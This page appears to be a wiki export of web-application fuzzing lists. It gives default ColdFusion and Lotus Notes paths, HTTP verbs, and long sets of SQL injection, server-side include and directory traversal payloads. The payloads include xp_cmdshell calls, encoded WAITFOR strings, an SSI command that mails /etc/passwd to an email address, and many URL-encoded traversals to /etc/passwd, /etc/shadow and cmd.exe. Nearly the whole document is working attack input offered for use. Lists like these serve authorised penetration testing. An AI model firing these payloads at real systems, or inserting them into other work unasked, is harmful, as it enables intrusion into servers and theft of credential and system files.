=== Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
